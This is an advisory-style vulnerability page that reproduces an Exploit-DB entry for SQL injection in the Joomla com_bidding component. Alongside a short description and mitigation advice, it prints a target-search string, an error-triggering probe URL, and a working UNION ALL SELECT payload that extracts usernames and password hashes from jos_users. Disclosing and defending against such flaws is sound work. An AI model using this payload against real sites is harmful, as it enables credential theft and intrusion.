header-logo
Suggest Exploit
vendor:
Joomla com_bidding
by:
N2n-Hacker
7.5
CVSS
HIGH
Sql Injection
CWE
Product Name: Joomla com_bidding
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Joomla com_bidding Sql Injection Vulnerability

The Joomla com_bidding component is vulnerable to SQL injection. By manipulating the 'id' parameter in the URL, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the database. The vulnerability can be exploited by appending a UNION ALL SELECT statement to the URL, allowing the attacker to extract data from the 'jos_users' table.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Users are advised to update to the latest version of the Joomla com_bidding component.
Source

Exploit-DB raw data:

#########################################################################
#########################################################################

                [ Joomla com_bidding Sql Injection Vulnerability ]

                          N2n-Hacker ----- 2nd@live.fr<mailto:2nd@live.fr>


#########################################################################
#########################################################################


# Searching = "option=com_bidding"


==> http://www.site.com/index.php?option=com_bidding&id=200' <=[SQLi]--

# error =
"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result"


==> Exploiting = http://www.site.com/index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2,
concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--



            \\\\\\\\\\\\\\\\\\ Activer khfif drif //////////////////

#########################################################################
                    My Bad Life But Not For4ver nchallah
#########################################################################

Navigation

Suggest Exploit

Services By CQR